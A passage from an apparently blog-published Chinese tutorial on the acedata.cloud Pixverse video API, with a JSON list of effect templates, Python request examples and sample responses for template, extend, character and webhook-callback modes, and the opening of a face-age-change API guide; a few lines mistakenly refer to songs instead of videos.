        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2Fgift111.gif",
        "thumbnail_video_path": "",
        "marker": "new",
        "created_at": "2024-12-15T03:16:32Z",
        "updated_at": "2024-12-30T06:08:16Z",
        "display_prompt": "I want a：",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"圣诞礼物盲盒\",\"display_prompt\":\"我想要：\"}}",
        "example_list": "[{\"img_id\":113741803,\"img_url\":\"https://media.pixverse.ai/upload%2Fb2626bc2-050d-4ea6-a864-e2054c012df5.png\"},{\"img_id\":113750690,\"img_url\":\"https://media.pixverse.ai/upload%2Fddd29e75-beeb-461c-9388-3e14c2709e73.png\"}]",
        "qualities": [
            "360p",
            "540p",
            "720p",
            "1080p"
        ]
    },
    {
        "display_name": "Where is Santa?",
        "workflow_tag": "where_is_santa_241213",
        "template_id": 311521879229312,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2Fwheresanta.gif",
        "thumbnail_video_path": "",
        "marker": "new",
        "created_at": "2024-12-15T03:17:26Z",
        "updated_at": "2024-12-30T06:08:24Z",
        "display_prompt": "Discovering Santa Claus in the parallel world!",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"圣诞老人藏在哪？\",\"display_prompt\":\"“发现”世界各处的圣诞老人\"}}",
        "example_list": "[{\"img_id\":119280295,\"img_url\":\"https://media.pixverse.ai/upload%2Fde34a072-325e-4d86-88d9-2daef292e1b4.jpeg\"},{\"img_id\":119280616,\"img_url\":\"https://media.pixverse.ai/upload%2F5b4da0a2-86c3-4204-adda-74bfa7c3d0d1.jpg\"}]",
        "qualities": [
            "360p",
            "540p",
            "720p",
            "1080p"
        ]
    },
    {
        "display_name": "Christmas OOTD",
        "workflow_tag": "tobe_santa_241219",
        "template_id": 312314911869312,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2Fbesanta33.gif",
        "thumbnail_video_path": "",
        "marker": "new",
        "created_at": "2024-12-19T14:51:09Z",
        "updated_at": "2024-12-30T06:08:08Z",
        "display_prompt": "Dress up as a Christmas star",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"圣诞战袍\",\"display_prompt\":\"测测什么圣诞装适合你\"}}",
        "example_list": "[{\"img_id\":113741803,\"img_url\":\"https://media.pixverse.ai/upload%2Fb2626bc2-050d-4ea6-a864-e2054c012df5.png\"},{\"img_id\":113750690,\"img_url\":\"https://media.pixverse.ai/upload%2Fddd29e75-beeb-461c-9388-3e14c2709e73.png\"}]",
        "qualities": [
            "360p",
            "540p",
            "720p",
            "1080p"
        ]
    },
    {
        "display_name": "We Are Venom!",
        "workflow_tag": "venom_241030",
        "template_id": 303624537709312,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2FWeAreVenom.gif",
        "thumbnail_video_path": "",
        "marker": "default",
        "created_at": "2024-10-31T12:08:42Z",
        "updated_at": "2024-12-25T10:19:28Z",
        "display_prompt": "Transform into a [BLACK] Venom",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"毒液变身！\",\"display_prompt\":\"变身成为【黑色】毒液\"}}",
        "example_list": "[{\"img_id\":113750602,\"img_url\":\"https://media.pixverse.ai/upload%2F920dc791-8c9f-4518-8761-82958a827190.png\"},{\"img_id\":113750690,\"img_url\":\"https://media.pixverse.ai/upload%2Fddd29e75-beeb-461c-9388-3e14c2709e73.png\"},{\"img_id\":113750791,\"img_url\":\"https://media.pixverse.ai/upload%2Ff2853009-8238-4e0f-93ec-cfc68fee28b7.png\"}]",
        "qualities": [
            "360p",
            "540p"
        ]
    },
    {
        "display_name": "Hot Harley Quinn",
        "workflow_tag": "harley_quinn_241121",
        "template_id": 307489434436288,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2FHotHarleyQuinn.gif",
        "thumbnail_video_path": "",
        "marker": "default",
        "created_at": "2024-11-22T08:21:19Z",
        "updated_at": "2024-12-26T07:40:43Z",
        "display_prompt": "Transform into Harley Quinn, mastering allure and chaos",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"小丑女哈莉·奎茵变身\",\"display_prompt\":\"化身小丑女哈莉·奎茵，掌控魅惑与疯狂\"}}",
        "example_list": "[{\"img_id\":113741803,\"img_url\":\"https://media.pixverse.ai/upload%2Fb2626bc2-050d-4ea6-a864-e2054c012df5.png\"},{\"img_id\":113742000,\"img_url\":\"https://media.pixverse.ai/upload%2F19090035-612e-40ed-9c8d-a7aaf781d492.png\"},{\"img_id\":113742074,\"img_url\":\"https://media.pixverse.ai/upload%2F50ed9020-7b58-4dd9-aa39-ff06b9e0df12.png\"}]",
        "qualities": [
            "360p",
            "540p"
        ]
    },
    {
        "display_name": "Crazy Cat Woman",
        "workflow_tag": "cat_woman_241121",
        "template_id": 307489548427968,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2FCrazyCatWoman.gif",
        "thumbnail_video_path": "",
        "marker": "default",
        "created_at": "2024-11-22T08:22:15Z",
        "updated_at": "2024-12-26T07:40:24Z",
        "display_prompt": "Transform into a Crazy Cat Woman and slay",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"疯狂猫女变身\",\"display_prompt\":\"变身妖娆猫女，撩翻全场！\"}}",
        "example_list": "[{\"img_id\":113742074,\"img_url\":\"https://media.pixverse.ai/upload%2F50ed9020-7b58-4dd9-aa39-ff06b9e0df12.png\"},{\"img_id\":113750690,\"img_url\":\"https://media.pixverse.ai/upload%2Fddd29e75-beeb-461c-9388-3e14c2709e73.png\"},{\"img_id\":113750791,\"img_url\":\"https://media.pixverse.ai/upload%2Ff2853009-8238-4e0f-93ec-cfc68fee28b7.png\"}]",
        "qualities": [
            "360p",
            "540p"
        ]
    },
    {
        "display_name": "Wonder Woman",
        "workflow_tag": "wonder_woman_241202",
        "template_id": 309283958194560,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2FWonderWoman.gif",
        "thumbnail_video_path": "",
        "marker": "default",
        "created_at": "2024-12-02T11:45:11Z",
        "updated_at": "2024-12-26T07:40:35Z",
        "display_prompt": "Transform into Wonder Woman and conquer the impossible",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"神奇女侠变身\",\"display_prompt\":\"成为神奇女侠，征服一切不可能\"}}",
        "example_list": "[{\"img_id\":113742074,\"img_url\":\"https://media.pixverse.ai/upload%2F50ed9020-7b58-4dd9-aa39-ff06b9e0df12.png\"},{\"img_id\":113750791,\"img_url\":\"https://media.pixverse.ai/upload%2Ff2853009-8238-4e0f-93ec-cfc68fee28b7.png\"}]",
        "qualities": [
            "360p",
            "540p"
        ]
    },
    {
        "display_name": "Hulk",
        "workflow_tag": "hulk_241106",
        "template_id": 304826314164992,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2FHulk.gif",
        "thumbnail_video_path": "",
        "marker": "default",
        "created_at": "2024-11-07T07:08:47Z",
        "updated_at": "2024-12-26T07:38:48Z",
        "display_prompt": "Unleash the Beast",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"召唤绿巨人\",\"display_prompt\":\"变身成绿巨人并捶爆一切\"}}",
        "example_list": "[{\"img_id\":113750602,\"img_url\":\"https://media.pixverse.ai/upload%2F920dc791-8c9f-4518-8761-82958a827190.png\"},{\"img_id\":113750690,\"img_url\":\"https://media.pixverse.ai/upload%2Fddd29e75-beeb-461c-9388-3e14c2709e73.png\"},{\"img_id\":113750791,\"img_url\":\"https://media.pixverse.ai/upload%2Ff2853009-8238-4e0f-93ec-cfc68fee28b7.png\"}]",
        "qualities": [
            "360p",
            "540p",
            "720p",
            "1080p"
        ]
    },
    {
        "display_name": "Joker's Rebirth",
        "workflow_tag": "joker_241106",
        "template_id": 304826126435072,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2Fcapcut_joker.gif",
        "thumbnail_video_path": "",
        "marker": "default",
        "created_at": "2024-11-07T07:07:16Z",
        "updated_at": "2024-12-26T07:38:54Z",
        "display_prompt": "Transform into a Joker",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"小丑重生\",\"display_prompt\":\"变身成小丑，诡异地微笑\"}}",
        "example_list": "[{\"img_id\":113750602,\"img_url\":\"https://media.pixverse.ai/upload%2F920dc791-8c9f-4518-8761-82958a827190.png\"},{\"img_id\":113750690,\"img_url\":\"https://media.pixverse.ai/upload%2Fddd29e75-beeb-461c-9388-3e14c2709e73.png\"},{\"img_id\":113750791,\"img_url\":\"https://media.pixverse.ai/upload%2Ff2853009-8238-4e0f-93ec-cfc68fee28b7.png\"}]",
        "qualities": [
            "360p",
            "540p",
            "720p",
            "1080p"
        ]
    },
    {
        "display_name": "Batman",
        "workflow_tag": "bat_man_241106",
        "template_id": 304826374632192,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2Fcapcut_batman.gif",
        "thumbnail_video_path": "",
        "marker": "default",
        "created_at": "2024-11-07T07:09:17Z",
        "updated_at": "2024-12-26T07:39:00Z",
        "display_prompt": "Transform into a Batman and embrace the night",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"蝙蝠侠归来\",\"display_prompt\":\"变身成蝙蝠侠并守护黑夜\"}}",
        "example_list": "[{\"img_id\":113741803,\"img_url\":\"https://media.pixverse.ai/upload%2Fb2626bc2-050d-4ea6-a864-e2054c012df5.png\"},{\"img_id\":113750690,\"img_url\":\"https://media.pixverse.ai/upload%2Fddd29e75-beeb-461c-9388-3e14c2709e73.png\"}]",
        "qualities": [
            "360p",
            "540p",
            "720p",
            "1080p"
        ]
    },
    {
        "display_name": "Iron Man",
        "workflow_tag": "iron_man_241106",
        "template_id": 304826054394624,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2Fcapcut_ironman.gif",
        "thumbnail_video_path": "",
        "marker": "default",
        "created_at": "2024-11-07T07:06:40Z",
        "updated_at": "2024-12-26T07:39:06Z",
        "display_prompt": "Activate Iron Mode",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"钢铁侠变身\",\"display_prompt\":\"激活钢铁模式\"}}",
        "example_list": "[{\"img_id\":113741803,\"img_url\":\"https://media.pixverse.ai/upload%2Fb2626bc2-050d-4ea6-a864-e2054c012df5.png\"},{\"img_id\":113750690,\"img_url\":\"https://media.pixverse.ai/upload%2Fddd29e75-beeb-461c-9388-3e14c2709e73.png\"}]",
        "qualities": [
            "360p",
            "540p",
            "720p",
            "1080p"
        ]
    },
    {
        "display_name": "Hair Growth Magic",
        "workflow_tag": "hair_magic_241128",
        "template_id": 308552687706496,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2Fcapcut_hairgrowth.gif",
        "thumbnail_video_path": "",
        "marker": "default",
        "created_at": "2024-11-28T08:34:06Z",
        "updated_at": "2024-12-25T10:19:28Z",
        "display_prompt": "Grow lots of hair. Never be bald.",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"发量王者\",\"display_prompt\":\"长出迷人秀发，永无秃头困扰。\"}}",
        "example_list": "[{\"img_id\":113750602,\"img_url\":\"https://media.pixverse.ai/upload%2F920dc791-8c9f-4518-8761-82958a827190.png\"},{\"img_id\":113750690,\"img_url\":\"https://media.pixverse.ai/upload%2Fddd29e75-beeb-461c-9388-3e14c2709e73.png\"},{\"img_id\":113750791,\"img_url\":\"https://media.pixverse.ai/upload%2Ff2853009-8238-4e0f-93ec-cfc68fee28b7.png\"}]",
        "qualities": [
            "360p",
            "540p",
            "720p",
            "1080p"
        ]
    },
    {
        "display_name": "COLORFUL Venom!",
        "workflow_tag": "random_venom_241104",
        "template_id": 304358279051648,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2Fcapcut_colorfulvenom.gif",
        "thumbnail_video_path": "",
        "marker": "default",
        "created_at": "2024-11-04T15:39:54Z",
        "updated_at": "2024-12-25T10:19:28Z",
        "display_prompt": "Transform into a [COLORFUL] Venom",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"毒液！(彩色盲盒版)\",\"display_prompt\":\"变身成为【彩色】毒液\"}}",
        "example_list": "[{\"img_id\":113741803,\"img_url\":\"https://media.pixverse.ai/upload%2Fb2626bc2-050d-4ea6-a864-e2054c012df5.png\"},{\"img_id\":113750690,\"img_url\":\"https://media.pixverse.ai/upload%2Fddd29e75-beeb-461c-9388-3e14c2709e73.png\"}]",
        "qualities": [
            "360p",
            "540p"
        ]
    },
    {
        "display_name": "Who is Venom?",
        "workflow_tag": "who_is_venom_241112",
        "template_id": 305714097668480,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2Fcapcut_whoisvenom.gif",
        "thumbnail_video_path": "",
        "marker": "default",
        "created_at": "2024-11-12T07:33:35Z",
        "updated_at": "2024-12-25T10:19:28Z",
        "display_prompt": "Which one of you guys is Venom? ",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"测测谁是毒液？\",\"display_prompt\":\"两人之中，必有一毒，速速现出原形\"}}",
        "example_list": "[{\"img_id\":111917190,\"img_url\":\"https://media.pixverse.ai/upload%2F6a6a0f6a-99be-4eac-83a1-9d265ca65823.png\"},{\"img_id\":111917753,\"img_url\":\"https://media.pixverse.ai/upload%2F079945d6-01aa-4688-9e9a-02e308c01db5.png\"},{\"img_id\":111917942,\"img_url\":\"https://media.pixverse.ai/upload%2F814307ed-4123-4f6b-a32e-4072b55378cb.png\"}]",
        "qualities": [
            "360p",
            "540p"
        ]
    },
    {
        "display_name": "Get a Venom buddy",
        "workflow_tag": "baby_venom_241114",
        "template_id": 306059795500352,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2Fcapcut_venombuddy.gif",
        "thumbnail_video_path": "",
        "marker": "default",
        "created_at": "2024-11-14T06:26:53Z",
        "updated_at": "2024-12-25T10:19:28Z",
        "display_prompt": "Your Venom buddy appears and gives you a hug",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"召唤毒液兄弟\",\"display_prompt\":\"你的毒液兄弟回到你身边，并与你深情相拥\"}}",
        "example_list": "[{\"img_id\":113741803,\"img_url\":\"https://media.pixverse.ai/upload%2Fb2626bc2-050d-4ea6-a864-e2054c012df5.png\"},{\"img_id\":113750690,\"img_url\":\"https://media.pixverse.ai/upload%2Fddd29e75-beeb-461c-9388-3e14c2709e73.png\"}]",
        "qualities": [
            "360p",
            "540p",
            "720p",
            "1080p"
        ]
    },
    {
        "display_name": "Wicked Shots",
        "workflow_tag": "wicked_paintings_241028",
        "template_id": 303788802773760,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2Fcapcut_wickedshot.gif",
        "thumbnail_video_path": "",
        "marker": "default",
        "created_at": "2024-11-01T10:25:30Z",
        "updated_at": "2024-12-25T10:19:28Z",
        "display_prompt": "The [SUBJECT] in the picture smiles wickedly and starts firing",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"扫射一切\",\"display_prompt\":\"邪魅一笑，并掏出一把机关枪开始扫射\"}}",
        "example_list": "",
        "qualities": [
            "360p",
            "540p",
            "720p",
            "1080p"
        ]
    },
    {
        "display_name": "Squish It",
        "workflow_tag": "squish_it_241028",
        "template_id": 302325299692608,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2Fcapcut_squishit.gif",
        "thumbnail_video_path": "",
        "marker": "default",
        "created_at": "2024-10-24T03:55:29Z",
        "updated_at": "2024-12-25T10:19:28Z",
        "display_prompt": "A pair of hands appears and squishes the [OBJECT] as if it's slime",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"捏捏更解压\",\"display_prompt\":\"变成可以捏捏的软泥\"}}",
        "example_list": "",
        "qualities": [
            "360p",
            "540p",
            "720p",
            "1080p"
        ]
    },
    {
        "display_name": "Lego Blast",
        "workflow_tag": "lego_blast_241028",
        "template_id": 302325299702848,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2Fcapcut_legoblast.gif",
        "thumbnail_video_path": "",
        "marker": "default",
        "created_at": "2024-10-24T03:55:29Z",
        "updated_at": "2024-12-25T10:19:28Z",
        "display_prompt": "The [OBJECT] shatters into pieces of Legos",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"乐高大爆炸\",\"display_prompt\":\"爆炸并碎裂成一片片乐高积木\"}}",
        "example_list": "",
        "qualities": [
            "360p",
            "540p",
            "720p",
            "1080p"
        ]
    },
    {
        "display_name": "Leggy Run",
        "workflow_tag": "leggy_run_241028",
        "template_id": 302325299711040,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2Fcapcut_leggyrun.gif",
        "thumbnail_video_path": "",
        "marker": "hot",
        "created_at": "2024-10-24T03:55:29Z",
        "updated_at": "2024-12-25T10:19:28Z",
        "display_prompt": "The [OBJECT] grows legs and runs away",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"全员腿精\",\"display_prompt\":\"长出了一双腿然后开始乱跑\"}}",
        "example_list": "",
        "qualities": [
            "360p",
            "540p",
            "720p",
            "1080p"
        ]
    },
    {
        "display_name": "Monster Invades",
        "workflow_tag": "monster_invasion_241028",
        "template_id": 302325299682368,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2Fcapcut_monster.gif",
        "thumbnail_video_path": "",
        "marker": "default",
        "created_at": "2024-10-24T03:55:29Z",
        "updated_at": "2024-12-25T10:19:28Z",
        "display_prompt": "A monster suddenly appears in the [SCENE] and starts walking around",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"怪兽入侵\",\"display_prompt\":\"场景中突然出现了一只怪兽\"}}",
        "example_list": "",
        "qualities": [
            "360p",
            "540p",
            "720p",
            "1080p"
        ]
    },
    {
        "display_name": "Wizard Hat",
        "workflow_tag": "animal_wizard_241028",
        "template_id": 302325299661888,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2Fcapcut_wizardhat.gif",
        "thumbnail_video_path": "",
        "marker": "hot",
        "created_at": "2024-10-24T03:55:29Z",
        "updated_at": "2024-12-25T10:19:28Z",
        "display_prompt": "The [SUBJECT] wears a magic wizard hat",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"戴上魔法帽\",\"display_prompt\":\"头顶出现了一顶可爱的魔法帽\"}}",
        "example_list": "",
        "qualities": [
            "360p",
            "540p",
            "720p",
            "1080p"
        ]
    },
    {
        "display_name": "Zombie Hand",
        "workflow_tag": "zombie_hand_241028",
        "template_id": 302325299672128,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2Fcapcut_weirdhand.gif",
        "thumbnail_video_path": "",
        "marker": "hot",
        "created_at": "2024-10-24T03:55:29Z",
        "updated_at": "2024-12-25T10:19:28Z",
        "display_prompt": "A zombie hand appears in the [SCENE]",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"僵尸手出没\",\"display_prompt\":\"从图片中的场景中钻出一只僵尸的手\"}}",
        "example_list": "",
        "qualities": [
            "360p",
            "540p",
            "720p",
            "1080p"
        ]
    },
    {
        "display_name": "Zombie Mode",
        "workflow_tag": "zombie_mode_241028",
        "template_id": 302325299651648,
        "thumbnail_path": "https://media.pixverse.ai/asset%2Ftemplate%2Fcapcut_zombiemode.gif",
        "thumbnail_video_path": "",
        "marker": "hot",
        "created_at": "2024-10-24T03:55:29Z",
        "updated_at": "2024-12-25T10:19:28Z",
        "display_prompt": "The [SUBJECT] suddenly transforms into a zombie.",
        "i18n_json": "{\"zh-CN\":{\"display_name\":\"坏了，我变僵尸了\",\"display_prompt\":\"突然变成僵尸\"}}",
        "example_list": "",
        "qualities": [
            "360p",
            "540p",
            "720p",
            "1080p"
        ]
    }
]

我们可以在上面选择一个 template_id 来生成视频，我们以302325299651648为示例生成视频，其他参数与基本使用类似，具体的参数如下图所示：

填写完毕之后自动生成了代码如下：

对应的 Python 代码：

import requests

url = "https://api.acedata.cloud/pixverse/videos"

headers = {
    "accept": "application/json",
    "authorization": "Bearer {token}",
    "content-type": "application/json"
}

payload = {
    "action": "generate",
    "prompt": "A group of people began to dance",
    "template_id": 302325299651648,
    "image_url": "https://cdn.acedata.cloud/n3r1mc.png"
}

response = requests.post(url, json=payload, headers=headers)
print(response.text)

点击运行，可以发现会得到一个结果，如下：

{
  "success": true,
  "task_id": "cf127eee-d23d-44c9-945c-793e68f86720",
  "trace_id": "aa7ed21d-8363-4eeb-a46a-a120e31b4fde",
  "data": [
    {
      "id": 318162170958272,
      "first_frame": "",
      "video_width": 0,
      "video_height": 0,
      "prompt": "A group of people began to dance",
      "model": "v3.5",
      "quality": "360p",
      "motion": "normal",
      "video_url": "https://media.pixverse.ai/pixverse%2Fmp4%2Fmedia%2Fweb%2F18d7fef6-2e59-48a5-a655-046464f34603_seed0.mp4",
      "template_id": 302325299651648,
      "template_name": "Zombie Mode",
      "style": "",
      "aspect_ratio": "16:9",
      "duration": 5,
      "extended": 0,
      "last_frame": "",
      "seed": 0,
      "asset_id": 0,
      "asset_name": ""
    }
  ]
}

可以看出，结果内容与是与视频模板特效一样的，这也就实现使用模板特效来生成视频的功能。

继续扩展视频生成功能

如果想对已经生成的Pixverse视频进行扩展生成的话，可以将参数 action 设置为 extend ，并且输入需要扩展生成视频的 ID，视频 ID 的获取是根据基本使用来获取，如下图所示：

这时候可以看到视频的 ID 为：

1	"id": 317989274748288

注意，这里的视频中 id 是生成后视频的 ID，如果你不知道如何生成视频，可以参考上文的基本使用来生成视频。

接下来我们要必须填歌词、风格自定义生成歌曲，就可以指定如下内容：

action：此次视频生成任务的行为，一般有普通生成 generate 和扩展视频 extend。
prompt：此次视频生成的提示词。
video_id：此次扩展视频任务的参考视频ID。

填写样例如下：

填写完毕之后自动生成了代码如下：

对应的 Python 代码：

import requests

url = "https://api.acedata.cloud/pixverse/videos"

headers = {
    "accept": "application/json",
    "authorization": "Bearer {token}",
    "content-type": "application/json"
}

payload = {
    "action": "extend",
    "prompt": "A group of people began to dance",
    "video_id": 317989274748288
}

response = requests.post(url, json=payload, headers=headers)
print(response.text)

点击运行，可以发现会得到一个结果，如下：

{
  "success": true,
  "task_id": "38b6d70d-eea2-40da-9f8b-945df93e831b",
  "trace_id": "b105bbb6-faf1-4d86-9c10-4b8a8e638d05",
  "data": [
    {
      "id": 318162960027008,
      "first_frame": "",
      "video_width": 0,
      "video_height": 0,
      "prompt": "A group of people began to dance",
      "model": "v3.5",
      "quality": "360p",
      "motion": "normal",
      "video_url": "https://media.pixverse.ai/pixverse%2Fmp4%2Fmedia%2Fweb%2F2368ad8b-81dc-4a2f-9b6c-e0ac205351f9_seed0.mp4",
      "template_id": 0,
      "template_name": "",
      "style": "",
      "aspect_ratio": "16:9",
      "duration": 5,
      "extended": 1,
      "last_frame": "",
      "seed": 0,
      "asset_id": 0,
      "asset_name": ""
    }
  ]
}

可以看出，结果内容与上文的是一致的，这也就实现视频的扩展生成功能。

自定义角色生成视频

如果想对根据一张图片角色来生成视频的话，需要额外输入根据图片创建的角色
ID字段 asset_id，字段 asset_id 的获取是使用 Pixverse Character API来获取，具体的结果如下图所示：

当生成角色ID之后就可以按照基本使用来生成视频了，这里以 asset_id= 318174747147968 为示例，下面是具体的参数：

点击运行后可以生成自定义角色的视频结果，具体的结果如下图所示：

{
  "success": true,
  "task_id": "d39994c7-53ba-4c3f-ae8f-44287c487d51",
  "trace_id": "32da3212-2d4c-4302-87ef-01ecb903a92b",
  "data": [
    {
      "id": 318175009783232,
      "first_frame": "",
      "video_width": 0,
      "video_height": 0,
      "prompt": "A group of people began to dance",
      "model": "v3.5",
      "quality": "360p",
      "motion": "normal",
      "video_url": "https://media.pixverse.ai/pixverse%2Fmp4%2Fmedia%2Fweb%2F61d477e4-3dab-4322-962d-18980b4e6f8c_seed0.mp4",
      "template_id": 0,
      "template_name": "",
      "style": "",
      "aspect_ratio": "16:9",
      "duration": 5,
      "extended": 0,
      "last_frame": "",
      "seed": 0,
      "asset_id": 318174747147968,
      "asset_name": "my-46169546-a9c0-4437-96ee-a9750bbd489f"
    }
  ]
}

生成的结果与上文类似，这就完成了按照角色来生成视频的过程。

目前所支持的特效模板

模版id以及对应的效果：

模版id	效果
321958627120000	AI发对象咯
324641581197696	一起摇摆！
324641385496960	360°旋转微波炉
325367418993728	樱花乌托邦
325501134629952	北极熊出没！
315447659476032	不打不相识
324640938615168	万物皆可毛绒玩具
308621408717184	成为肌肉猛男
313358700761536	万物皆可变形金刚
316645675647872	雪茄大佬
321956810449792	奥斯卡影帝
323578865822784	性别转换器
303624424723200	爱的抱抱
313555098280384	换上比基尼
313649491716544	猛虎的抱抱
313649622731200	天使之翼
316826014376384	拥抱耶稣
315446315336768	爱的亲亲
322852853601344	万物皆可走红毯
304826314164992	绿巨人变身
315447659476032	黑悟空引擎
313359138372032	成为美少女战士
308552687706496	发量王者
307489548427968	疯狂猫女变身
304826126435072	小丑重生
304826374632192	蝙蝠侠归来
304358279051648	毒液！(彩色盲盒版)
304826054394624	钢铁侠变身
317013509917440	新年战裙
313358844899776	做自己的财神
313359048325568	蛇年的第一个贴贴
307489434436288	小丑女哈莉·奎茵变身
311521768592256	圣诞礼物盲盒
311521879229312	圣诞老人藏在哪？
312314911869312	圣诞战袍
306059795500352	召唤毒液兄弟
303788802773760	扫射一切
302325299702848	乐高大爆炸
302325299682368	怪兽入侵
302325299661888	戴上魔法帽
302325299651648	坏了，我变僵尸了
302325299672128	僵尸手出没

风格：

动作模式	效果
normal	普通模式
fast	性能模式

运镜

参数	效果
horizontal_left	水平向左
horizontal_right	水平向右
vertical_up	垂直向上
vertical_down	垂直向下
crane_up	上升镜头
hitchcock	希区柯克变焦
zoom_in	放大
zoom_out	缩小
quickly_zoom_in	快速推进
quickly_zoom_out	快速拉远
smooth_zoom_in	平滑推进
super_dolly_out	超级拉远
left_follow	左侧跟拍
right_follow	右侧跟拍
pan_left	左侧环弧
pan_right	右侧环弧
fix_bg	固定镜头
camera_rotation	镜头旋转
robo_arm	机械臂运动
whip_pan	快速摇镜

异步回调

由于 Pixverse 生成音乐的时间相对较长，大约需要 1-2 分钟，如果 API 长时间无响应，HTTP 请求会一直保持连接，导致额外的系统资源消耗，所以本 API 也提供了异步回调的支持。

整体流程是：客户端发起请求的时候，额外指定一个 callback_url 字段，客户端发起 API 请求之后，API 会立马返回一个结果，包含一个 task_id 的字段信息，代表当前的任务 ID。当任务完成之后，生成音乐的结果会通过 POST JSON 的形式发送到客户端指定的 callback_url，其中也包括了 task_id 字段，这样任务结果就可以通过 ID 关联起来了。

下面我们通过示例来了解下具体怎样操作。

首先，Webhook 回调是一个可以接收 HTTP 请求的服务，开发者应该替换为自己搭建的 HTTP 服务器的 URL。此处为了方便演示，使用一个公开的 Webhook 样例网站 https://webhook.site/，打开该网站即可得到一个 Webhook URL，如图所示：

将此 URL 复制下来，就可以作为 Webhook 来使用，此处的样例为 https://webhook.site/8dc4cd74-4f4c-49ab-95c8-fa503cca5534。

接下来，我们可以设置字段 callback_url 为上述 Webhook URL，同时填入 prompt，如图所示：

点击运行，可以发现会立即得到一个结果，如下：

1
2
3

{
  "task_id": "84acf7e2-66a7-407a-8295-f0cc7a58579b"
}

稍等片刻，我们可以在 https://webhook.site/8dc4cd74-4f4c-49ab-95c8-fa503cca5534 上观察到生成歌曲的结果，如图所示：

内容如下：

{
  "success": true,
  "task_id": "84acf7e2-66a7-407a-8295-f0cc7a58579b",
  "trace_id": "a4b9b5d5-10fe-4a8e-8cd4-642056908fe8",
  "data": [
    {
      "id": 318175621179584,
      "first_frame": "",
      "video_width": 0,
      "video_height": 0,
      "prompt": "quiver",
      "model": "v3.5",
      "quality": "360p",
      "motion": "normal",
      "video_url": "https://media.pixverse.ai/pixverse%2Fmp4%2Fmedia%2Fweb%2Ff1739bd1-a005-48f8-8464-0b6e4ba7b071_seed0.mp4",
      "template_id": 0,
      "template_name": "",
      "style": "",
      "aspect_ratio": "16:9",
      "duration": 5,
      "extended": 0,
      "last_frame": "",
      "seed": 0,
      "asset_id": 0,
      "asset_name": ""
    }
  ]
}

可以看到结果中有一个 task_id 字段，其他的字段都和上文类似，通过该字段即可实现任务的关联。

错误处理

如果发生错误，您将得到类似如下的错误信息：

{
  "success": false,
  "error": {
    "code": "forbidden",
    "message": "Song Description contained artist name: eminem"
  },
  "trace_id": "9bb7c2f4-3b7b-4965-b50a-f663874b1b6f",
  "task_id": "9bb3a2a6-c438-436d-a9f3-fa466abc077c"
}

作者崔庆才发表于 2025-06-24 阅读次数：本文字数： 31k 阅读时长 ≈ 28 分钟

API 人脸年龄变化 API 对接说明

本文将介绍一种人脸年龄变化 API 对接说明，它可以通过输入图片和年龄，从而来改变图片中人脸的年龄图片，大致的用法是用户上传一张人脸图片，基于人脸编辑与生成算法，输出一张人脸变老或变年轻的图片，支持实现人脸不同年龄的变化。

接下来介绍下人脸年龄变化 API 的对接说明。

申请流程

要使用 API，需要先到人脸年龄变化 API 对应页面申请对应的服务，进入页面之后，点击「Acquire」按钮，如图所示：

如果你尚未登录或注册，会自动跳转到登录页面邀请您来注册和登录，登录注册之后会自动返回当前页面。

在首次申请时会有免费额度赠送，可以免费使用该 API。

基本使用

首先先了解下基本的使用方式，就是输入图片链接以及年龄信息，便可获得处理后结果图片，首先需要简单地传递一个 image_url 字段，人脸图片如下图所示：

然后我们还需上传关于人脸年龄信息参数 age_infos ，它是一个数组，我们可以传多个信息，我们接下来就可以在界面上填写对应的内容，如图所示：

可以看到这里我们设置了 Request Headers，包括：

accept：想要接收怎样格式的响应结果，这里填写为 application/json，即 JSON 格式。
authorization：调用 API 的密钥，申请之后可以直接下拉选择。

另外设置了 Request Body，包括：

image_url：需要处理的人脸图片链接。
age_infos：关于人脸年龄和区域信息，其中年龄是必选参数。

选择之后，可以发现右侧也生成了对应代码，如图所示：

点击「Try」按钮即可进行测试，如上图所示，这里我们就得到了如下结果：

1
2
3

{
